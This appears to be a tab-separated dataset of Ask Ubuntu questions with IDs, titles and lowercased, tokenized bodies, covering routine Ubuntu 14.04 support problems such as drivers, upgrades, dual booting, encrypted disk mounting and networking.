450762	how can i monitor fps in native linux games	so getting to the question what is the most user friendly overlay option for measuring native linux games framerate ( preferably no compiling necessary ) ? i have done a fair amount of research and i understand that there are a few methods to choose from . the available solutions i have looked at include frapix , fluffy tapeworm , bugle , and mumble . i have only found moderate success with the last option ( mumble ) i can start a program with the mumble-overlay command after navigating to the proper folder . and as far as i can tell everything is up and running fine however when i launch rust.x86 it fails to get past the grey screen with facepunch logo ( i can see the frame rate overlay ) . so i am left only with programs that need to be compiled . and while i am not computer illiterate i am not proficient enough with linux to compile a program ( not for a lack of trying ) . ( game in question rust by facepunch hosted on steam for linux which runs fine without the overlay ) the game does not have an internally programmed frame monitor and is natively run so wine and play on linux tips and tricks will not help .
450763	trusty made my internet slow	installed ubuntu 14.04 and now the internet is slow.i have a 1mbps internet . in 13.10 i used to get around 110kbps download speed . after installing 14.04 the download speed i get is around 20kbps.why ? please help .
450766	can i change the language format of virtual box using terminal ?	hi i 'm new to this and have found virtual box is kind of understandable if you squint and keep doing double-takes . it 's in english but written in greek or latin characters which is fun for a while but i 'd quite like my life ( or lack of ) back . any ideas how i might change it to plain boring english ?
450767	multi display issue with ubuntu gnome 14.04	fresh install of ubuntu gnome 14.04 with 3 displays ( fglrx driver ) . i can correct the screens order in system settings / display but it is not saved when i close the session and reopen it . screens order in gdm is also wrong . copy/pasting the .config/monitors.xml file into /var/lib/gdm/.config/ does n't change anything . does anybody have an idea ?
450769	forgot ubuntu passwords and would like to start fresh	i installed ubuntu on a windows vista laptop last year , did n't use it much and now am trying to update to newer version and run other updates that it lists , but it asks for my password and i have no idea what it is . i do not have any files to save as i just used it for internet access so would like to just completely start over , install latest version and not setup passwords , any guidance for someone that is really just savy enough to install a printer driver .
450770	upgrade freezes , leaves system un-bootable	after the previous upgrades ( from 12.10 via 13.04 to 13.10 ) went without problems , i tried to upgrade from 13.10 to 14.04 . after downloading it stopped and asked for stopping xscreensaver , i did . then there were several error messages concerning fontconfig `` ... out of memory '' . at one of these error messages the system froze , not even the mouse pointer was moving anymore , nor ctrl-alt f2 was working . after hardware reset , at boot the system complained about not being able to identify the hardware and only showed a box `` what do you want to do '' . what can i do ? does an install from cd make sense ? and which one , 13.10 or 14.04 ?
450774	fogger in ubuntu 14.04 is not working	i used fogger in ubuntu 12.04 lts , and it worked great . recently , i installed 14.04 lts , and in 14.04 i was unable to install fogger . i added the ppa from terminal : sudo add-apt-repository ppa : loneowais/fogger it added , but updating shows an error and fogger is not installing in 14.04 . i really liked fogger , and i do n't want to use webapps as alternatives .
450776	how do you set up numlockx at startup in ubuntu 14.04	in ubuntu 13.10 in order to install numlockx you had to run : sudo apt-get install numlockx after you install numlockx you had to run : gksudo gedit /etc/lightdm/lightdm.conf at the end of this file you had to enter greeter-setup-script=/usr/bin/numlockx on in 14.04 when you run gksudo gedit /etc/lightdm/lightdm.conf it opens up a blank file ... . how do i set up numlockx in 14.04 ? i have also tried to follow this answer but that did not work either .
450779	ubuntu 14.04 - nvidia geforce 630m not possible to change to a bigger resolution	i have a laptop hp sleekbook 15 with nvidia geforce 630m and intel hd graphic 3000 . seems that they both are working ( i can switch between them ) but i would like to increase the resolution when i enable nvidia . but for the both cards the maximum resolution is 1366x768 . is this a matter of the display or some settings should be done with nvidia card ? thank you !
450784	[ solved ] symbol lookup error : /usr/lib/i386-linux-gnu/libqtopengl.so.4 : undefined symbol : _znk14qwidgetprivate17hasheightforwidthev	i installed skype using several process in my newly installed ubuntu 14 . 04 64 bit ... it shows a skype icon in dash ... but when i click on it , nothings happens . what can i do ? i tried almost everything found in net . every time it installed quite normally and found skype icon in dash . but not opening , when i click on it . i downloaded skype 4.2 version from their website and installed using software centre and also tried installing via command line . but still not working . when i tried to run skype using terminal it produce following output -- skype : symbol lookup error : /usr/lib/i386-linux-gnu/libqtopengl.so.4 : undefined symbol : _znk14qwidgetprivate17hasheightforwidthev
450788	flash plugin download problem	so when i start installing flash player from software center , it gives an error saying that it couldnt download flash plugin . `` the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . ''
450789	vmware player : `` no protocol specified '' error after upgrading to ubuntu 14.04	i had installed `` vmware-player-6.0.1-1379776.x86_64.bundle '' in my ubuntu 13.10 . today i upgrade to ubuntu 14.4 lts . now when i try to launch vmware player it shows a messagebox : before you can run vmware several modules mush be compiled , and loaded into the running kernel i pressed `` install '' button . but gets error , it does n't start . so i tried to reinstall it by typing : ./vmware-player-6.0.1-1379776.x86_64.bundle now it shows , extracting vmware installer ... done . gtk-message : failed to load module `` overlay-scrollbar '' : liboverlay-scrollbar.so : can not open shared object file : no such file or directory gtk-message : failed to load module `` unity-gtk-module '' : libunity-gtk-module.so : can not open shared object file : no such file or directory no protocol specified no protocol specified [ # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ] 100 % the system is up to date . nothing has been modified . how can i launch vmware player , what i need to install now ? my win8 is working with vmware player . please help me .
450792	main menu for docky	i have been looking quite some time for a main menu for docky . everything i find seems to be outdated or not what i 'm looking for . i have found a solution that looked good to me , it was cardapio for docky but the developers dropped support roughly a year or two ago and i can not install it . i do not want to replace the docky button with the classic gnome main menu , i want something more like the mint menu , cardapio , or even the windows 7 start menu . i want to thank you ahead of time , this is a feature i have wanted for quite some time . i am not a fan of the unity launcher because of its limitations . docky is light , a bit more open to customization , and smoother .
450793	ubuntu 14.04 does n't recognize win8	i have a lenovo ideapad y480 in windows 8 , dual boot with ubuntu 13.10 . i was using ubuntu 13.10 happily until i ungraded to 14.04 . i got `` serious errors while checking the disk drives for / . '' i used `` install ubuntu alongside windows 8 '' option when i installed 13.10 , so i uninstalled it in windows and tried to re-installed 14.04 using a usb stick . however , the installer does not recognize my win8 os . there are only options to `` erase everything and install ubuntu '' or to create partitions for ubuntu . i tried the latter one , but formatting free space to ext4 file system takes infinite time ( the installer does not response in an hour ) . and i lost my win8 as well . i re-installed win 8 and still have the problem with installing ubuntu . i tried installing 13.10 but it can not recognize windows 8 either . please help ! thanks ! any version of ubuntu is ok !
450802	tp-link tl-wn722n bad connection quality	i have a tp-link tl-wn722n wi-fi adapter , and i suffer from bad connection quality on ubuntu . dowload speeds may vary from 3 mb/s down to 40 kb/s , ping is unstable a online games are unplayable . on windows it works flawlessly . any ideas , what may cause the problem ?
450804	cheese do not start due `` gstreamer elements are missing : cluttervideosink ''	i recently upgraded to ubuntu gnome 14.04 , and when i tried to use cheese , it showed the message one or more needed gstreamer elements are missing : cluttervideosink cheese worked just fine in 13.10 and on the live cd of 14.04 . i have tried installing other gstreamer things , but nothing has worked .
450811	boot screen glitch	for some reason , every time i boot up ubuntu on my macbook , the boot screen is glitches , with white lines scattered in the middle . how can i fix this ?
450812	synaptics pointing device sensitivity too low	i turned off mouse acceleration for my touchpad in xubuntu on my laptop , and now the sensitivity is way too low . i ca n't have acceleration because it 's unusable for me that way and i also ca n't have the sensitivity this low . how do i increase the sensitivity above what is allowed in the mouse settings dialogue ?
450816	active window wo n't release control of the mouse	when one application has focus , i ca n't click to focus another application . example : right now i have firefox focused , but i ca n't click to shift focus to a terminal window that i have open . additionally , i also ca n't click the unity sidebar which likely means that the active window wo n't release control even to unity . i 've tried using xed to ensure that all of my mouse buttons are indeed functioning , and the mouse itself works perfectly fine in windows 7 . i 've experienced this problem on ubuntu 12.04 , xubuntu 12.04 , ubuntu 13.10 , ubuntu 14.04 , and mint 16 . the mouse i am using is the logitech performance mx . i may also be useful to note that the mouse appeared to be working find up until a month or so ago on ubuntu 12.04 when some of the erratic behavior began . if there is any other information that may be useful in leading to the solution to this problem let me know , and i will try to provide it .
450821	apache2 is not running on 14.04	i install lamp in my ubuntu 14.04 but when i use ( sudo apache2ctl status | grep version ) command it returns : /usr/sbin/apache2ctl : 101 : /usr/sbin/apache2ctl : www-browser : not found 'www-browser -dump localhost:80/server-status '' ' failed . maybe you need to install a package providing www-browser or you need to adjust the apache_lynx variable in /etc/apache2/envvars what can i do ?
450823	i accidentley deleted my mp3 files on my mp3 device	i accidently deleted my whole library on my mp3 player because i wanted to syncronise with rhythmbox . it deleted all my songs and put the few , that were in my folder on my device . how can i get the songs on my device back ?
450825	ubuntu 14.04 phpmyadmin ca n't find mcrypt extension	i 've tried suggestions for solving this dealing with 13.10 , but they do n't seem to work . hard refresh of the page does n't remove the error . phpmyadmin has a box at the bottom indicating that the mcrypt extension is missing , even though it is installed for php . how do i fix this ?
450828	steps to install ubuntu without shutting down winxp	i have bootable usb with ubuntu 14.04 . as my bios can not change the priority of boot device . i need to start installation ubuntu , within logging winxp , by bootable usb in it . can i do it like that ? ? thanks and regards , shahas
450836	could not open efi boot fallback.efi:14 in lenovo g510	in a lenovo g510 . i want to install the latest version of ubuntu , which is 13.10 , but there is an error . the screen shows this message : could not open efi boot fallback.efi:14
450837	kingston datatraveler wo n't mount in ubuntu 14.04	i try and try and try but ubuntu 14.04 is not recognizing my flash drive . it 's a kingston datatraveler which has never caused me any problems before until now . anybody know what to do ?
450841	problems setting up ubuntu as print server	i have a hp laser printer attached via usb to my ubuntu 12.04 system and it is working just fine . i am following the procedure in the ubuntu community help wiki to set up a ubuntu print server that will allow my networked windows machines to print to this laser printer . i have installed samba . the very first step in the wiki procedure is to open the system-administration-printing window ... it opens , no problem . but ... there is no menu bar in that window that will allow me to set up a server . the screen pic in the wiki shows a `` server-printer-view-help '' menu bar , but that bar does not show on the window that comes up with my system . i 'm a newbie , so any suggestions/observations will be greatly appreciated . thanks !
450843	how to add program that is not installed via software center to launcher ?	i installed android development tools ( you just download it and run the executable file inside a folder ) . i want to pin the adt to the launcher . how to do that ? i tried to drag the executable file , but it did n't work . i also tried to click `` lock to the launcher '' ( on the right click when it 's running ) , but it also did n't work . any ideas ? edit1 : if i create shortcut like in the article you claim answers my question . can i install normal eclipse and set it in a way it 's the same like adt downloaded from android.com ? i tried that as well , but some features are missing . edit2 : here 's the error that i get when i try to run it : edit3 : here 's what i typed : edit4 : this is the file that 's launched successfully : edit5 : i tried without apostrophes , but i get the same error message .
450855	unable to access server by name after setting static ip	i changed my /etc/network/interfaces from this : auto eth0 iface eth0 inet dhcp to this : auto eth0 iface eth0 inet static address 192.168.1.5 netmask 255.255.255.0 gateway 192.168.1.1 network 192.168.1.0 broadcast 192.168.1.255 dns-search my.lan dns-nameservers 192.168.1.1 8.8.8.8 since the edit i can access the server via its ip address : ssh ubiquibacon @ 192.168.1.5 but i can no longer access it by its name : ssh ubiquibacon @ server i checked /etc/resolv.conf to make sure the nameserver was in there and it was . i 'm kind of at a loss here . it `` just works '' on freebsd so the freebsd server can be accessed via ip or name .
450856	chromebook crouton installation continually failing	i have a samsung arm ( series 3 ) chromebook . following the tutorials online to download ubuntu via crouton , and each of the three times i have tried , i get this error before the installation unexpectedly ends : gzip : unexpected end of file tar : child returned status 1 tar : error is not recoverable : exiting now failed to complete chroot setup unmounting /usr/local/chroots/precise ... i 've literally tried installing unity twice and then xfce and it 's taken up my entire morning . what is happening , and is there a fix to this problem ? if not , i 'm afraid i 'm going to have to purchase another chromebook just so i can use a command line
450857	command that displays a string argument	what command will return whatever value is given to it . for example , you would enter the command followed by the string hello world and it will print hello world to the console . does such a command exist , and what is it ?
450859	every time i open the software center i get `` failed to execute child process ''	every time i try to use the software center i get the following error failed to execute child process any suggestions ?
450863	grub/boot issue	i have installed trusty tahr now and is pretty happy with it . however , while booting my pc after the installation , i was getting error : '' error : file not found grub rescue '' i searched for the issue online and corrected it by using `` boot-repair '' . now my system is booting via hd . but , now everytime it boots , it shows a selection screen first having 4 options , first of which is ubuntu . its similar to what we see on having multiple os . but , i have installed ubuntu only . i can go ahead by pressing enter or it do it so automatically after 10 secs . but , i want behaviour to be default , like when we have a single os installed . so , please tell me whats the issue and how can i correct it . regards .
450869	ubuntu boots to tty1	i have installed ubuntu 14.04 and it was working but then i rebooted and now it boots to a command line that says tty1 if i press control alt f1 - f8 it goes to tty1 - tty8 . how do i fix this
450875	unreliable cpu thermal sensor ; monitoring disabled ubuntu 14.04	i installed ubuntu 14.04 on my pc and it shows something like that when i boot : unreliable cpu thermal sensor ; monitoring disabled is there something wrong with my cpu or is it sensor fault ?
450876	authenticating error with ubuntu 14.04 lts	< problem : just as i upgraded my ubuntu 13.10 to 14.04 lts . i could n't pass keyring and bash authentication . i can login in recovery mood for both root and my account , but that 's not the case in the gnome . every time i login with sudo , the bash response : `` sorry , try again . '' if i login in the terminal with su , it says : `` authentication failure '' even when i lock the desktop , i ca n't login in the gnome , while i can do that with ctr+alt+f1 in tty1 . i 'm pretty sure from the keys , caps is off , num is on , my account is already added to sudoers file and so on . help me in this , please . thanks in advance .
450882	mount ntfs external hard drive on ubuntu 14.04	hi , i am trying to mount an external hard drive ( on which i have files saved from windows 8 ) on ubuntu 14.04 , but ubuntu can not mount it . this is the message i get : error mounting /dev/sdb1 at /media/claudia/elements : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/claudia/elements '' ' exited with non-zero exit status 12 : failed to read last sector ( 3907027119 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? this is what i get with sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x4471529d device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 2000.4 gb , 2000396746752 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907024896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002de0f device boot start end blocks id system /dev/sdb1 2048 3907029167 1953513560 7 hpfs/ntfs/exfat also , this information may be useful : /dev/sda1 : uuid= '' 135b-8d68 '' type= '' vfat '' /dev/sda2 : uuid= '' 876dac0d-cc03-4fdd-93de-8876a12d35d9 '' type= '' ext4 '' /dev/sda3 : uuid= '' ac8b7136-4e3a-41a0-8b5d-680cac00daac '' type= '' swap '' /dev/sdb1 : label= '' elements '' uuid= '' b6900f79900f3efd '' type= '' ntfs '' any help would be very much appreciated . thanks a lot .
450883	sensor indicator for ubuntu 14.04	is there any repo for stable version of indicator-sensor ubuntu 14.04 ? or are there any other alternatives to indicator-sensor for ubuntu 14.04 ?
450887	is that bad statistics for my laptop battery ?	battery capacity is 76.4 % . is that bad ? does it mean my battery is dying ? actually it 's decreasing everyday by .1 .
450890	xfce / xubuntu : centering the name of the launchers on the desktop ?	how does one center the names of launchers on the desktop on xubuntu , if the name has multiple lines ? this is how it is : this is what i want it to be :
450894	dynamic library run as root	i have a dynamic library which must run as root , but for normal users who can not use sudo , they may not be able to use the library , is that possible to configure the dynamic library thus normal users can use the library ? i have tried to set uid bit of the dynamic library .so files but it did n't work .
450895	mount luks encrypted hard drive at boot	i have xubuntu 14.04 on a ssd device ( the home was encrypted correctly during intallation ) , additionally i have a hdd with a encrypted partition with extra data which i would like to mount in /mnt/hdd . for making these i followed the next steps : ( previously i had encrypted the disk with luks following this post http : //www.marclewis.com/2011/04/02/luks-encrypted-disks-under-ubuntu-1010/ ) check the uuid sudo blkid /dev/sda1 : uuid= '' b3024cc1-93d1-439f-80ce-1b1ceeafda1e '' type= '' crypto_luks '' make a keyfile with the right passphrase and save it in my home ( which is also encrypted ) . sudo dd if=/dev/urandom of=/home/ [ username ] /.keyfiles/key_luks bs=1024 count=4 sudo chmod 0400 .keyfiles/key_luks add the key sudo cryptsetup luksaddkey /dev/sda1 /home/zeugor/.keyfiles/key_luks new entry in /etc/crypttab hddencrypted uuid=b3024cc1-93d1-439f-80ce-1b1ceeafda1e /home/ [ username ] /.keyfiles/key_luks luks update the initial ramdisk sudo update-initramfs -u -k all then , to test it , i used the follow command to start cryptdisks : sudo cryptdisks_start hddencrypted * starting crypto disk ... * hddencrypted ( starting ) .. * hddencrypted ( started ) ... to check hddencrypted was mapped : ls /dev/mapper/ control hddencrypted create a mount point mkdir /mnt/hdd new entry in /etc/fstab /dev/mapper/hddencrypted /mnt/hdd ext4 defaults 0 2 validate fstab without reboot : sudo mount -a mount the encrypted partition on boot now i have mount it in/mnt/hdd as i proposed . but i wold like to make this automatically after reboot . but before i can log in , i get this error : the disk drive for /mnt/hdd is not ready yet or not permit all this makes me think that /etc/crypttab ca n't access to the keyfile which is located in my home ( other encrypted partition ) . i do n't know the order which the system follows to unencrypted and mounts the units . my home should be unencrypted before my hdd for giving access to read the keyfile . i would appreciate any insight as to why this happens . update : if i locate the keyfile in /boot ( no encrypted ) , instead of in my /home/ [ username ] ( encrypted ) the /dev/sda1 and update the entry in /etc/crypttab is perfectly mounted on boot time .
450897	steam alternative to dota 2 installation	i connect to internet via proxy which has blocked steam ports and i want to install dota 2 to play offline . is there an alternative installation procedure to steam by which i can install dota 2 on my ubuntu 14.04 ?
450898	kdocker does n't appear in notification area in ubuntu 14.04	running kdocker and then clicking on a window hides the window , but no icon appears in the notification area in ubuntu 14.04 in either gnome flashback ( metacity ) or xfce-session . if i find kdocker 's process id and kill it , i get the hidden window back . this looks like a bug . it worked fine in ubuntu 13.10 and earlier .
450902	distribution upgrade problem	i 'm trying to upgrade ubuntu 13.04 to 13.10 . i have executed the terminal command : sudo apt-get dist-upgrade i 've got the following error : dpkg : error processing /var/cache/apt/archives/linux-image-3.8.0-35-generic_3.8.0-35.52~precise1_amd64.deb ( -- unpack ) : trying to overwrite '/lib/modules/3.8.0-35-generic/kernel/mm/hwpoison-inject.ko ' , which is also in package linux-image-extra-3.8.0-35-generic 3.8.0-35.50 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.8.0-35-generic_3.8.0-35.52~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
450906	how to revert a do-release-upgrade ?	i can update my ubuntu to the new lts version . as you can think , its not a highly important server since i run 13.10 ( not a lts version ) . anyway - i actually want to upgrade my server , but would like to be able to revert this upgrade . i would be able to reinstall ubuntu 13.10 and overwrite it with my backup . but i want to know if there is a more comfortable way to do this . tbh i guess theres no command as undo-release-upgrade but i thought it would be worth to ask for it . this is my current daily backup script tar cvpzf $ backup_file -- exclude=/proc -- exclude=/lost+found -- exclude= $ backup_file -- exclude=/mnt -- exclude=/sys -- exclude=/media -- exclude=/tmp /
450915	ubuntu 14.04 macbook pro 5.2 full screen video	i installed 14.04 on my macbook pro 5,2 and installed the nvidia propriety drivers . when i play a video in full screen it gets choppy ( not flash ) plays smooth not in full screen . both ccsm and nvidia settings has sync to v-blank . any help ?
450918	bash change keyboard back-light ( dell xps l502x )	i have a dell xps 15 l502x . how can i turn on/off keyboard backlight from terminal or through a bash script ?
450921	troubles installing mplabx on trusty	i 'm trying to install mplabx on my brand new ubuntu 14.04 and i found there are lots of problems . i already did it on 13.10 64bits with no major troubles in the microchip site says i need to instal a few dependences but not for most 64-bits linux os . since i could n't make the installer work i did it anyway , it did n't work and i found that ia32-lib is no longer supported ( needed ) on ubuntu microchip 's linux-64 dependences site i tried to install ia32-libs replacements ( lib32z1 , lib32ncurses5 and lib32bz2-1.0 ) but that did n't work either the installer is a .run . i give it permission to execute and run it with sudo but it fails and gives no error message at all if anyone could help me please ! i really need to make it work
450922	target filesystem does n't have requested /sbin.init	i installed 14.04 this morning beside windows 7 [ they worked fine together with 13.10 ] . now ubuntu will not start , but windows will [ i think they ran together in wubi ] . i get the busybox and a string of text that culminates in pa target filesystem does n't have requested /sbin.init . no init found . try passing init= bootarg .
450923	some help with dwm ( dynamic window manger )	okay , so i 'm trying to rice my pc here 's some problems i 'm having and would love some help on . first how do i change the bg color on the `` desktop '' right now it just solid black . i tried editing the top of config.h but that didnt work . is their a way to get transparent window borders cause i would love that thanks .
450925	how to connect to softether vpn server	i have a softether vpn server on my vps . it is openvpn compatible . i can connect using openvpn app on ios . i also connected on windows without any problem but i could not make it on linux . i installed network-manager-openvpn-client on my client computer . when i try to create a openvpn connection it asks me for certificate files but there is not any . i only have a openvpn configuration file ( .opvn ) . how can i make this connection ? i 'd be grateful if you could point me to the right direction for the solution . my purpose is to use only this connection , prevent any other net access and make this connection automatically on login .
450928	how can i configure the bootloader to load a specific drive ?	i have 3 drives on my computer system and the bootloader will only show two of them to choose from . if i am limited to choosing from only two of the drives how do i configure the bootloader to choose the drives i want ?
450933	which 14.04 distro for core2 duo with 4 gb ram ? 32 bit ?	so , does my 6-yr old core-2 duo 32-bit processor system work best with the 32-bit distro , or will the 64 bit version work ?
450935	question about manual partitioning for dual boot system	i recently bought a new laptop , and i am trying to dual boot my system with windows 8.1 and ubuntu . my installer does n't recognize the windows 8 partition on my hard drive , so it does n't give me the option to install alongside windows . i can see a large partition that is supposed to be my windows partition in the installer , but it does n't recognize that it is windows . i have turned off secure boot and fast start-up , but there is no difference . i am thinking about manually partitioning my hard drive in the ubuntu installer . i have two questions : first , i am planning on partitioning it with 16 gb swap , which is the amount of ram on my laptop , and about 20 gb for a '/ ' root logical partition . is this a good setup for the installer ? my second question is about the grub menu . if i do the manual install , will grub recognize my windows partition even though the ubuntu installer does n't ? meaning when i see the grub menu , will it just list /dev/sd # or will it say windows like before , or maybe not even show it at all ? laptop specs : hp envy 15t-j100 intel i7-4700mq 16gb ram 1tb hdd
450944	ubuntu 14.04 lts steam wont start	help , here is a log from console : running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140419233923_1.dmp /home/marcin/.local/share/steam/steam.sh : line 704 : 6588 naruszenie ochrony pamięci ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' installing bootstrap /home/marcin/.local/share/steam/bootstrap.tar.xz running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/marcin/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140419233925_1.dmp /home/marcin/.local/share/steam/steam.sh : line 704 : 6703 naruszenie ochrony pamięci ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-840e39ba-8625-4803-a600-be4812140419 finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-f63f876b-e7d7-4526-a5c9-568452140419
450946	how to sync the progress reading of ebooks from android ?	there are android apps wich use dropbox or google drive for syncing the reading progress of ebooks . is there any app or software for syncing the progress in android and ubuntu ?
450948	module `` qtqml.models '' is not installed	after upgrading to ubuntu 14.04 i removed the official qtcreator in order to install the modified version from the software center because i 'd like to try the sdk . fortunately , the docs are now included in the official installation . unfortunately , there is still something missing : the official examples . luckily i had my old and official installation still on my harddrive and then , after some tries , i copied the examples to /usr/lib/x86_64-linux-gnu/qt5/examples and change the permission . then qtcreator detected examples and i was able to select them from the examples section . but there are still one problem remaining . after running some qml examples ( like stocqt ) i get a small blank window and the message module `` qtqml.models '' is not installed
450950	`` how would you use the ls command to display all of the files/directories in the directory ‘/sbin’ that start with ‘az’ ? ``	i could do this on my own if i was in the /sbin directory , but i cant seem to figure out how to do this form the parent directory .
450951	what will happen to the programs ( purchased games , word , etc . ) i already have on my computer if i change from windows to kubuntu ?	i am concerned about how changing my operating system will affect the programs i have already downloaded while using my windows 7 operating system .
450952	how can i enable screenlock without turning off the monitor ? ( ubuntu gnome 14.04 )	ubuntu gnome 14.04 when locking the screen , my monitor/screen turns off immediately . i do n't want that to happen immediately , more like after 30 minutes or so . is that possible ?
450953	start ntpd -qg after network connection	i am trying to synchronise two machines that connected over ad-hoc network . none of the computers are connected to the internet . one computer does n't have a real time clock , so everytime i reset it , its clock resets to 1970 . the other one is a laptop and its clock should be master . the computer ( which does n't have rtc ) creates an ad-hoc on the boot . i connect that network with the laptop . i want my computer ( the one without rtc ) to reset its clock ntpd -qg when another computer connects to its ad-hoc network . after that ntpd will take place and start synchronising slowly .
450954	wireless not working on asus f552cl-sx049h	i tried ubuntu 14.04 live on my asus f552cl-sx049h , and the wireless is not working . running lspci gives the following result : [ ... ] 03:00.0 network controller : mediatek corp. mt7630e 802.11bgn wireless network adapter [ ... ] iwconfig says `` no wireless extensions . '' lshw -c network shows no drivers bound to the wireless network adapter . the kernel version is 3.13.0-24-generic . edit : the following is the output of this script , as requested by wild man in the comments . # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux ubuntu 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 03:00.0 network controller [ 0280 ] : mediatek corp. mt7630e 802.11bgn wireless network adapter [ 14c3:7630 ] subsystem : foxconn international , inc. device [ 105b : e074 ] 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device [ 10ec:5289 ] ( rev 01 ) 04:00.2 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0a ) subsystem : asustek computer inc. device [ 1043:200f ] kernel driver in use : r8169 # # # # # lsusb # # # # # bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 04f2 : b40a chicony electronics co. , ltd bus 001 device 003 : id 0489 : e069 foxconn / hon hai bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 05e3:0727 genesys logic , inc. microsd reader/writer bus 003 device 002 : id 090c:1000 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) flash drive bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 6 , 20 ) ( 2457 - 2482 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 6 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 160 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 5250 - 5330 @ 160 ) , ( 6 , 20 ) , dfs , passive-scan , no-ibss ( 5490 - 5730 @ 160 ) , ( 6 , 20 ) , dfs , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # # # # # # iwlist channel # # # # # # # # # # lsmod # # # # # # # # # # modinfo # # # # # # # # # # modules # # # # # # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb 